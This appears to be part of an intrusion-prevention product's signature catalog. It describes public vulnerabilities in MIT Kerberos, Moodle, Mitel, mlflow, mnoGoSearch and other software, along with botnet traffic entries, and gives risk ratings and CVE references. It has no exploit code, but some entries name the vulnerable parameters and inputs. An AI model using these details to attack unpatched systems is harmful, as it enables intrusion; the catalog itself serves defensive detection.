SunRPC_MIT-Kerberos-Kadmind-Rename-Principal-Buffer-Overflow

References:

CVE-2007-2798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2798

BID-24653
http://www.securityfocus.com/bid/24653

OSVDB-36595
http://www.osvdb.org/36595

MIT-Kerberos-Kadmind-RPC-Library-RPCSEC-GSS-Authentication-BOF

About this vulnerability:

Buffer overflow vulnerability in MIT Kerberos Administration Server

Risk:

High

First detected in:

sgpkg-ips-120-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Buffer Overflow

Description:

There is a remote exploitable buffer overflow vulnerability in the MIT Kerberos Administration Server. The vulnerability can be exploited by sending a crafted Kerberos message that contains an overly large value in the Length field of the credentials section to compromise the vulnerable system.

Situation:

SunRPC_TCP-MIT-Kerberos-Kadmind-RPC-Library-RPCSEC-GSS-Authentication-BOF

References:

CVE-2007-3999
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3999

BID-25534
http://www.securityfocus.com/bid/25534

MIT-Kerberos-Kadmind-RPC-Library-Uninitialized-Pointer

About this vulnerability:

A vulnerability in Kerberos

Risk:

High

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

MIT Kerberos

Type:

Buffer Overflow

Description:

There exists a memory corruption vulnerability in the Kerberos Administration Server (kadmind). The vulnerability is due to insufficient validating of user-supplied data while processing RPC requests. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted RPC request to the kadmind daemon. Successful exploitation may lead to executing arbitrary code with root privileges on the target host.

Situation:

SunRPC_TCP-MIT-Kerberos-Kadmind-RPC-Library-Uninitialized-Pointer

References:

CVE-2007-2442
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442

BID-24655
http://www.securityfocus.com/bid/24655

OSVDB-36596
http://www.osvdb.org/36596

MIT-Kerberos-KDC-Authentication-Denial-Of-Service

About this vulnerability:

A vulnerability in MIT Kerberos

Risk:

Moderate

First detected in:

sgpkg-ips-288-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Input Validation

Description:

There is a denial of service vulnerability in MIT's Kerberos KDC. The vulnerability is due to an assertion failure when handling invalid Authentication Service requests. Remote unauthenticated attackers can exploit this vulnerability by sending a crafted AS-REQ packet to the target KDC, causing it to crash, resulting in a denial of service condition.

Situation:

Generic_UDP-MIT-Kerberos-KDC-Authentication-Denial-Of-Service

References:

CVE-2010-0283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0283

BID-38260
http://www.securityfocus.com/bid/38260

MIT-Kerberos-KDC-Cross-Realm-Referral-Denial-of-Service

About this vulnerability:

An MIT Kerberos KDC Cross Realm Referral Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-1001-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos 5

Type:

Null Pointer Dereference

Description:

A vulnerability in MIT Kerberos 5 which allows remote attackers to cause a denial of service condition by sending a specially crafted packet to the affected KDC, due to a NULL pointer dereference in the KDC cross-realm referral processing implementation.

Situation:

Generic_UDP-MIT-Kerberos-KDC-Cross-Realm-Referral-Denial-of-Service

References:

CVE-2009-3295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3295

MIT-Kerberos-KDC-Null-Pointer-Denial-Of-Service

About this vulnerability:

A vulnerability in MIT Kerberos

Risk:

Moderate

First detected in:

sgpkg-ips-426-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Malfunction

Description:

A denial of service vulnerability exists in MIT's Kerberos implementation. The vulnerability is due to a NULL pointer dereference when the Key Distribution Center (KDC) handles malformed requests. Remote un-authenticated attackers could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation of this vulnerability can crash the KDC service, causing a denial of service condition.

Situation:

Generic_UDP-MIT-Kerberos-KDC-Null-Pointer-Denial-Of-Service

References:

CVE-2011-0283
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0283

BID-46272
http://www.securityfocus.com/bid/46272

MIT-Kerberos-KDC-Ticket-Validation-Double-Free-Memory-Corruption

About this vulnerability:

A vulnerability in MIT Kerberos

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Malfunction

Description:

A memory corruption vulnerability exists in the MIT Kerberos KDC server. The vulnerability is due to a double-free in the ticket validation mechanism (do_tgs_req.c). Remote authenticated attackers can exploit this vulnerability by sending a specially crafted packet to the target server. Successful exploitation of this vulnerability would allow code injection and execution in the context of root account. If the code injection is not successful, the vulnerable server might terminate abnormally, causing a denial of service condition.

Situation:

Generic_UDP-MIT-Kerberos-KDC-Ticket-Validation-Double-Free-Memory-Corruption

References:

CVE-2010-1320
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1320

BID-39599
http://www.securityfocus.com/bid/39599

MIT-Kerberos-V5-Kadmind-Klog_vsyslog-Server-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in MIT Kerberos

Risk:

High

First detected in:

sgpkg-ips-626-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Debian GNU/Linux; Fedora Linux; Gentoo Linux; Mandrake Linux; SUSE Linux; OpenBSD; Red Hat Enterprise Linux; Red Hat Linux; Ubuntu Linux

Software:

MIT Kerberos

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in MIT Kerberos. The vulnerability is due to a boundary error in the server's logging function in the Kerberos Administration Server (kadmind). A remote, authenticated attacker can exploit this vulnerability by supplying a specially crafted string to the kadmind daemon. Successful exploitation would cause a stack based buffer overflow that can lead to compromising the Kerberos key database, or executing arbitrary code with root privileges on the target host. In a simple attack aiming for denial of service, the Kerberos Administration service (kadmind) will terminate abnormally as a result of an attack. The Kerberos administration functionality remains unavailable until the service is restarted. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, which may be system/root level.

Situation:

Generic_UDP-MIT-Kerberos-V5-Kadmind-Klog_vsyslog-Server-Stack-Buffer-Overflow

References:

CVE-2007-0957
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0957

BID-23285
http://www.securityfocus.com/bid/23285

MIT-Kerberos-V5-KDC-Krb5_Unparse_Name-Heap-Overflow

About this vulnerability:

A vulnerability in MIT Kerberos Project Kerberos

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MIT Kerberos

Type:

Buffer Overflow

Description:

There is a single byte heap overflow vulnerability in the MIT Kerberos V5 Key Distribution Center (KDC) implementation. The vulnerability is caused due to improper boundary checking in krb5_unparse_name function, and can result in a single byte overflow of a heap buffer. An unauthenticated remote attacker can leverage this vulnerability to cause a denial of service or to execute arbitrary code, potentially compromising an entire Kerberos realm. In a simple attack scenario, the Key Distribution Center (KDC) server will terminate as a result of an attack. Consequently, the functionality of servers and workstations in the affected Kerberos Realm is interrupted, creating a site-wide denial of service condition. The KDC functionality remains unavailable until the server is restarted. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component would execute in the security context of the service process, which may be system/root level.

Situation:

Generic_MIT-Kerberos-V5-KDC-Krb5_Unparse_Name-Heap-Overflow

References:

CVE-2005-1175
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1175

BID-14236
http://www.securityfocus.com/bid/14236

Mitel-MiCollab-SQL-Injection-CVE-2024-35286

About this vulnerability:

An attempt to exploit a vulnerability in Mitel MiCollab detected

Risk:

High

First detected in:

sgpkg-ips-1809-5242

Last changed:

sgpkg-ips-1809-5242

Platform:

Generic

Software:

Mitel MiCollab

Type:

SQL Injection

Description:

A vulnerability in NuPoint Messenger (NPM) of Mitel MiCollab through 9.8.0.33 allows an unauthenticated attacker to conduct a SQL injection attack due to insufficient sanitization of user input. A successful exploit could allow an attacker to access sensitive information and execute arbitrary database and management operations.

Situation:

HTTP_CRL-Mitel-MiCollab-SQL-Injection-CVE-2024-35286

References:

CVE-2024-35286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-35286

Mitel-MiVoice-Connect-Remote-Code-Execution-CVE-2022-29499

About this vulnerability:

A vulnerability in Mitel MiVoice Connect

Risk:

High

First detected in:

sgpkg-ips-1482-5242

Last changed:

sgpkg-ips-1482-5242

Platform:

Generic

Software:

Mitel MiVoice Connect

Type:

Input Validation

Description:

An unauthenticated remote code execution vulnerability has been reported in Mitel MiVoice Connect.

Situation:

HTTP_CRL-Mitel-MiVoice-Connect-Remote-Code-Execution-CVE-2022-29499

References:

CVE-2022-29499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29499

Mitel-SIP-Phone-Argument-Injection-CVE-2024-41710

About this vulnerability:

An attempt to exploit a vulnerability in Mitel SIP phone detected

Risk:

High

First detected in:

sgpkg-ips-1831-5242

Last changed:

sgpkg-ips-1831-5242

Platform:

Generic

Software:

Mitel SIP Phone

Type:

Input Validation

Description:

A vulnerability in the Mitel 6800 Series, 6900 Series, and 6900w Series SIP Phones, including the 6970 Conference Unit, through R6.4.0.HF1 (R6.4.0.136) could allow an authenticated attacker with administrative privilege to conduct an argument injection attack, due to insufficient parameter sanitization during the boot process. A successful exploit could allow an attacker to execute arbitrary commands within the context of the system.

Situation:

HTTP_CRL-Mitel-SIP-Phone-Argument-Injection-CVE-2024-41710

References:

CVE-2024-41710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41710

Mitsubishi-Electric-E-Designer-Becomlislave-Status_Bit-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Mitsubishi Electric E-Designer

Risk:

Moderate

First detected in:

sgpkg-ips-975-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mitsubishi Electric E-Designer

Type:

Buffer Overflow

Description:

Improper validation of the Status_bit parameter in the configuration file of Mitsubishi's Electric E-Designer causes a stack buffer overflow vulnerability. A successful exploitation allows an attacker to execute arbitrary code with the privileges of the affected user.

Situation:

File-Text_Mitsubishi-Electric-E-Designer-Becomlislave-Status_Bit-Stack-Buffer-Overflow

References:

CVE-2017-9638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9638

Mitsubishi-Electric-E-Designer-Setupalarm-Font-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Mitsubishi Electric E-Designer

Risk:

Moderate

First detected in:

sgpkg-ips-972-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mitsubishi Electric E-Designer

Type:

Buffer Overflow

Description:

Bad validation of the font parameters in a .mpa file causes a stack buffer overflow in Mitsubishi Electric E-Designer. A successful attack allows arbitrary code execution with user privileges on the target system.

Situation:

File-Text_Mitsubishi-Electric-E-Designer-Setupalarm-Font-Stack-Buffer-Overflow

References:

CVE-2017-9638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9638

Mitsubishi-MC-WorkX-8.02-ActiveX-Control-Vulnerability

About this vulnerability:

A vulnerability in Mitsubishi MC-WorkX 8.02

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mitsubishi MC-WorkX 8.02

Type:

Malfunction

Description:

There is a directory traversal vulnerability in Mitsubishi MC-WorkX 8.02. The vulnerability is due to insufficient validation of parameters used in the FileName() method in an ActiveX control.

Situation:

File-Text_Mitsubishi-MC-WorkX-8.02-ActiveX-Control-Vulnerability

References:

CVE-2013-2817
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2817

OSVDB-97379
http://www.osvdb.org/97379

Mitsubishi-MX-ActiveX-Control-ActUWzd.dll-Buffer-Overflow

About this vulnerability:

A vulnerability in Mitsubishi MX

Risk:

High

First detected in:

sgpkg-ips-609-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Mitsubishi MX

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in the ActUWzd.dll ActiveX control of Mitsubishi MX which may allow remote attackers to execute arbitrary code via a long string parameter.

Situation:

File-Text_Mitsubishi-MX-ActiveX-Control-ActUWzd.dll-Buffer-Overflow

References:

CVE-2013-3075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3075

OSVDB-91661
http://www.osvdb.org/91661

Mlflow-Experiments-Local-File-Inclusion-CVE-2023-6909

About this vulnerability:

A vulnerability in mlflow

Risk:

High

First detected in:

sgpkg-ips-1781-5242

Last changed:

sgpkg-ips-1781-5242

Platform:

Generic

Software:

mlflow

Type:

Directory Traversal

Description:

A local file inclusion vulnerability has been reported in mlflow versions prior to 2.9.2. Successfully exploiting this vulnerability allows an unauthenticated attacker to read arbitrary system files, leading into the disclosure of sensitive information such as passwords.

Situation:

HTTP_CRL-Mlflow-Experiments-Local-File-Inclusion-Vulnerabilities

References:

CVE-2023-6909
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6909

Mlflow-Experiments-Local-File-Inclusion-CVE-2024-2928

About this vulnerability:

A vulnerability in mlflow

Risk:

High

First detected in:

sgpkg-ips-1781-5242

Last changed:

sgpkg-ips-1781-5242

Platform:

Generic

Software:

mlflow

Type:

Directory Traversal

Description:

A local file inclusion vulnerability has been reported in mlflow versions prior to 2.11.3. This vulnerability exists due to the insufficient patch for CVE-2023-6909. A successful exploit allows an unauthenticated attacker to read arbitrary system files, leading into the disclosure of sensitive information such as passwords.

Situation:

HTTP_CRL-Mlflow-Experiments-Local-File-Inclusion-Vulnerabilities

References:

CVE-2024-2928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2928

MnoGoSearch-Search-Cgi-Tmplt-Parameter-BOF

About this vulnerability:

Buffer overflow in mnoGoSearch search.cgi

Risk:

High

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

mnoGoSearch

Type:

Buffer Overflow

Description:

MnoGoSearch is vulnerable to a buffer overflow, caused by improper bounds checking of parameters passed to the search.cgi script. By passing a "tmplt" parameter containing over 1024 characters to the search.cgi script, a remote attacker could overflow a buffer and cause the program to crash or possibly execute arbitrary code on the system.

Situation:

HTTP_CSU-MnoGoSearch-Search-Cgi-Tmplt-Parameter-BOF

References:

CVE-2003-0437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0437

BID-7866
http://www.securityfocus.com/bid/7866

MnoGoSearch-Search-Cgi-Ul-Parameter-BOF

About this vulnerability:

Buffer overflow in mnoGoSearch search.cgi

Risk:

High

First detected in:

sgpkg-ips-14-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

mnoGoSearch

Type:

Buffer Overflow

Description:

MnoGoSearch is vulnerable to a buffer overflow, caused by improper bounds checking of parameters passed to the search.cgi script. By passing a "ul" parameter containing over 5000 characters to the search.cgi script, a remote attacker could overflow a buffer and cause the program to crash or possibly execute arbitrary code on the system.

Situation:

HTTP_CSU-MnoGoSearch-Search-Cgi-Ul-Parameter-BOF

References:

CVE-2003-0436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0436

BID-7865
http://www.securityfocus.com/bid/7865

MnoGoSearch-Search-Cgi-Wf-Parameter-BOF

About this vulnerability:	Unknown buffer overflow in mnoGoSearch search.cgi
Risk:	High
First detected in:	sgpkg-ips-14-1102
Last changed:	sgpkg-ips-1637-5242
Platform:	Generic
Software:	mnoGoSearch
Type:	Buffer Overflow
Description:	MnoGoSearch is vulnerable to a buffer overflow, caused by improper bounds checking of parameters passed to the search.cgi script. By passing a "wf" parameter containing a large string to the search.cgi script, a remote attacker could overflow a buffer and cause the program to crash or possibly execute arbitrary code on the system.

Mobile-Mouse-RCE

About this vulnerability:	A vulnerability in Mobile Mouse Server.
Risk:	High
First detected in:	sgpkg-ips-1514-5242
Last changed:	sgpkg-ips-1514-5242
Platform:	Windows
Software:	Mobile Mouse Server
Type:	Insecure Configuration
Description:	A vulnerability in Mobile Mouse Server which allows remote attackers to deploy a payload and run it from the server.
Situation:	Generic_CS-Mobile-Mouse-RCE

MobileIron-Remote-Code-Execution-CVE-2020-15505

About this vulnerability:

An attempt to exploit a vulnerability in MobileIron detected

Risk:

High

First detected in:

sgpkg-ips-1288-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MobileIron

Type:

Directory Traversal

Description:

There exists a remote code execution vulnerability in MobileIron Core, MobileIron Connector, MobileIron Sentry and MobileIron Monitor and Reporting Database (RDB). Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-MobileIron-Remote-Code-Execution-CVE-2020-15505

References:

CVE-2020-15505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15505

Mocbot

About this vulnerability:	MocBot
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	MocBot is a worm that spreads by exploiting the remote buffer overflow vulnerability in Microsoft Windows Server Service (MS06-040). It listens to commands via IRC.
Situation:	HTTP_CSU-Mocbot-Traffic

Mocbot-Botnet

About this vulnerability:	Mocbot bonet
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Mocbot is an IRC-controlled bot.
Situation:	Generic_CS-IRC-Mocbot-Activity

Modbus-SCADA-Directory-Traversal

About this vulnerability:	A vulnerability in Modbus SCADA
Risk:	High
First detected in:	sgpkg-ips-607-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Modbus SCADA
Type:	Malfunction
Description:	There is a directory traversal vulnerability in Modbus SCADA.
Situation:	HTTP_CSU-Multiple-Directory-Traversal-Vulnerabilities

MODx-Reflect-Base-File-Inclusion

About this vulnerability:

File inclusion vulnerability in MODx

Risk:

High

First detected in:

sgpkg-ips-194-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MODx

Type:

Input Validation

Description:

There is a file inclusion vulnerability in MODx content manangement system written in PHP scripting language. The software does not validate parameters for snippet.reflect.php script correctly allowing inclusion and execution of arbitary PHP code in the context of the web server process.

Situation:

HTTP_CRL-MODx-Reflect-Base-File-Inclusion

References:

OSVDB-50394
http://www.osvdb.org/50394

MODX-Revolution-phpthumb.php-CVE-2018-1000207

About this vulnerability:

A vulnerability in MODX Revolution

Risk:

Moderate

First detected in:

sgpkg-ips-1381-5242

Last changed:

sgpkg-ips-1381-5242

Platform:

Generic

Software:

MODX Revolution

Type:

Malfunction

Description:

An access control vulnerability has been reported in MODX Revolution versions up to 2.6.4. A successful exploitation of this vulnerability could lead in arbitrary file creation and command execution.

Situation:

HTTP_CRL-MODX-Revolution-phpthumb.php-CVE-2018-1000207

References:

CVE-2018-1000207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000207

MoinMoin-Remote-Code-Execution

About this vulnerability:

A MoinMoin Remote Code Execution vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-705-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

MoinMoin

Type:

Input Validation

Description:

An input validation vulnerability in MoinMoin, versions 1.9.0 through 1.9.5, which allows authenticated remote attackers to execute arbitrary code by first uploading a file with an executable extension via directory traversal, and then executing the file via a direct request.

Situation:

HTTP_CSU_MoinMoin-Remote-Code-Execution

References:

CVE-2012-6081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6081

BID-57082
http://www.securityfocus.com/bid/57082

OSVDB-88825
http://www.osvdb.org/88825

Momentum-Botnet

About this vulnerability:	Momentum botnet
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	Momentum is a malicious botnet that infects Linux-based systems.
Situation:	Generic_CS-Momentum-Botnet-C-And-C-Traffic

Mongo-Express-Remote-Code-Execution-CVE-2019-10758

About this vulnerability:

An attempt to exploit a vulnerability in Mongo Express detected

Risk:

High

First detected in:

sgpkg-ips-1419-5242

Last changed:

sgpkg-ips-1419-5242

Platform:

Generic

Software:

Mongo Express

Type:

Code Injection

Description:

An unauthenticated remote code execution vulnerability has been reported in Mongo Express versions before 0.54.0.

Situation:

HTTP_CRL-Mongo-Express-Remote-Code-Execution-CVE-2019-10758

References:

CVE-2019-10758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10758

MongoDB-Unauthenticated-Remote-Database-Drop

About this vulnerability:	A MongoDB Unauthenticated Remote Database Drop vulnerability
Risk:	High
First detected in:	sgpkg-ips-947-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux; Windows
Software:	MongoDB
Type:	Insecure Configuration
Description:	A vulnerability in MongoDB which allows remote attackers to execute arbitrary database commands without authentication.
Situation:	Generic_CS-MongoDB-Unauthenticated-Remote-Database-Drop

Monitorr-Unauthenticated-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Monitorr detected

Risk:

High

First detected in:

sgpkg-ips-1654-5242

Last changed:

sgpkg-ips-1654-5242

Platform:

Windows;Linux;Unix

Software:

Monitorr

Type:

Input Validation

Description:

A vulnerability in Monitorr, versions 1.7.6m, 1.7.7d and below, which allows remote attackers to upload and execute malicious php files through upload.php due to insufficient input validation.

Situation:

HTTP_CS-Monitorr-Unauthenticated-Remote-Code-Execution

References:

CVE-2020-28871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28871

Monkif-Bot

About this vulnerability:	Monkif Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Monkif is a Bot that may download additional malicious content on the infected machine.
Situation:	File-Text_Monkif-Bot-Traffic

MONSOON-Control-Traffic

About this vulnerability:	Traffic related to the MONSOON malware campaign
Risk:	High
First detected in:	sgpkg-ips-789-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	Traffic related to the MONSOON malware and espionage campaign has been detected.
Situation:	HTTP_CRL-MONSOON-CnC-Traffic File-TextId_MONSOON-CnC-Traffic File-Text_MONSOON-CnC-Traffic

Montala-Limited-ResourceSpace-Index.php-Cross-Site-Scripting

About this vulnerability:

A vulnerability in ResourceSpace

Risk:

Moderate

First detected in:

sgpkg-ips-1408-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

ResourceSpace

Type:

Input Validation

Description:

A reflected cross-site scripting vulnerability exists in ResourceSpace by Montala Limited. The vulnerability is due to improper input validation of user input passed to index.php page. An unauthenticated user could exploit the vulnerability by sending malicious requests to the target server. Successful exploitation could result in the execution of script code in the security context of the browser of any user visiting the affected pages.

Situation:

HTTP_CRL-Montala-Limited-ResourceSpace-Index.php-Cross-Site-Scripting

References:

CVE-2021-41951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41951

Montala-Limited-ResourceSpace-Tiles.php-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in ResourceSpace

Risk:

High

First detected in:

sgpkg-ips-1408-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

ResourceSpace

Type:

Directory Traversal

Description:

An arbitrary file deletion vulnerability exists in ResourceSpace by Montala Limited. The vulnerability is due to unsanitized parameters used in the titles.php page. A remote, unauthenticated attacker may exploit this vulnerability by sending maliciously crafted HTTP packets. Successful exploitation of this vulnerability could allow attackers to delete arbitrary files on the target system.

Situation:

HTTP_CRL-Montala-Limited-ResourceSpace-Tiles.php-Arbitrary-File-Deletion

References:

CVE-2021-41950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41950

Montala-ResourceSpace-User_Functions-SQL-Injection

About this vulnerability:

A vulnerability in Montala Limited ResourceSpace

Risk:

Moderate

First detected in:

sgpkg-ips-1433-5242

Last changed:

sgpkg-ips-1433-5242

Platform:

Generic

Software:

ResourceSpace

Type:

Input Validation

Description:

Improper input validation in the user_functions.php endpoint causes an SQL injection vulnerability in ResourceSpace by Montala Limited. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Montala-ResourceSpace-User_Functions-SQL-Injection

References:

CVE-2021-41765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41765

Moodle-Admin-Shell-Upload

About this vulnerability:

A vulnerability in Moodle.

Risk:

High

First detected in:

sgpkg-ips-1399-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Unix; Linux

Software:

Moodle

Type:

Malfunction

Description:

A vulnerability in Moodle, versions 3.6.3, 3.8.0, 3.9.0, 3.10.0, 3.11.2, which allows remote attackers to execute arbitrary code by sending and installing a crafted plugin which can receive a malicious payload request.

Situation:

HTTP_CS-Moodle-Admin-Shell-Upload

References:

CVE-2019-11631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11631

Moodle-Authenticated-Spelling-Binary-RCE

About this vulnerability:

A vulnerability in Moodle.

Risk:

High

First detected in:

sgpkg-ips-1399-5242

Last changed:

sgpkg-ips-1399-5242

Platform:

Unix; Linux

Software:

Moodle

Type:

Input Validation

Description:

A vulnerability in Moodle, versions 2.5.2 and 2.2.3, which allows remote attackers to execute arbitrary shell commands via the aspellpath variable, due to insufficient input validation.

Situation:

HTTP_CRL-Moodle-Authenticated-Spelling-Binary-RCE

References:

CVE-2013-3630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3630

Moodle-Calculated-Question-Remote-Code-Execution-CVE-2018-1133

About this vulnerability:

A vulnerability in Moodle

Risk:

High

First detected in:

sgpkg-ips-1866-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

Moodle

Type:

Input Validation

Description:

An eval injection vulnerability in Moodle 3.x allows an attacker with the teacher role permissions to execute arbitrary code on the server.

Situation:

HTTP_CRL-Moodle-Calculated-Question-Remote-Code-Execution-CVE-2018-1133

References:

CVE-2018-1133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1133

Moodle-Calculated-Question-Types-Remote-Code-Execution-CVE-2024-43425

About this vulnerability:

An attempt to exploit a vulnerability in Moodle detected

Risk:

High

First detected in:

sgpkg-ips-1820-5242

Last changed:

sgpkg-ips-1820-5242

Platform:

Generic

Software:

Moodle

Type:

Input Validation

Description:

There is a vulnerability in Moodle that arises from improper handling of calculated question types. An attacker with the ability to add/update calculated question types could exploit it to inject malicious code, leading to remote code execution on the server.

Situation:

HTTP_CRL-Moodle-Calculated-Question-Types-Remote-Code-Execution-CVE-2024-43425

References:

CVE-2024-43425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43425

Moodle-Remote-Command-Execution

About this vulnerability:

Moodle Remote Command Execution

Risk:

Moderate

First detected in:

sgpkg-ips-572-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Moodle

Type:

Code Injection

Description:

There is a remote command execution vulnerability in Moodle. An authenticated user can redirect Moodles spellchecker module to an arbitrary command, allowing remote code execution.

Situation:

HTTP_CRL-Moodle-Remote-Command-Execution

References:

CVE-2013-3630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3630

Moodle-SpellChecker-Path-Authenticated-RCE

About this vulnerability:

A vulnerability in Moodle.

Risk:

High

First detected in:

sgpkg-ips-1399-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Unix; Linux

Software:

Moodle

Type:

Input Validation

Description:

A vulnerability in Moodle, versions 3.11.2, 3.10.0, and 3.8.0, which allows remote attackers to execute arbitrary code via a backtick shell injection in the aspellpath variable, due to insufficient input validation.

Situation:

HTTP_CRL-Moodle-SpellChecker-Path-Authenticated-RCE

References:

CVE-2021-21809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21809

Moodle-Teacher-Enrollment-Privilege-Escalation-To-RCE

About this vulnerability:

A vulnerability in Moodle.

Risk:

High

First detected in:

sgpkg-ips-1400-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Unix; Linux

Software:

Moodle

Type:

Input Validation

Description:

A vulnerability in Moodle, version 3.9, which allows remote authenticated attackers to add themselves as a manager, grant themselves system manager permissions, and reconfigure to allow the installation of addon/plugins. RCE is accomplished via a malicious theme upload.

Situation:

HTTP_CRL-Moodle-Teacher-Enrollment-Privilege-Escalation-To-RCE

References:

CVE-2020-14321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14321

Morcut-Malware

About this vulnerability:	Morcut Malware Traffic
Risk:	High
First detected in:	sgpkg-ips-614-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Morcut
Type:	Code Injection
Description:	Morcut is a backdoor and rootkit combination installed by a cross-platform Java application which may pretend to be an Adobe updater when downloaded and runs as "Web Enchancer".
Situation:	HTTP_CSU-Morcut-Malware-Traffic-Detected HTTP_CSH-Morcut-Malware-Traffic-Detected

Mosca-MQTT-Invalid-Regex-Denial-Of-Service-CVE-2018-11615

About this vulnerability:

A vulnerability in Mosca

Risk:

High

First detected in:

sgpkg-ips-1867-5242

Last changed:

sgpkg-ips-1867-5242

Platform:

Generic

Software:

Mosca

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported in npm mosca 2.8.1. An unauthenticated attacker could crash the MQTT broker by subscribing to a topic containing a crafted regular expression.

Situation:

Generic_CS-Mosca-MQTT-Invalid-Regex-Denial-Of-Service-CVE-2018-11615

References:

CVE-2018-11615
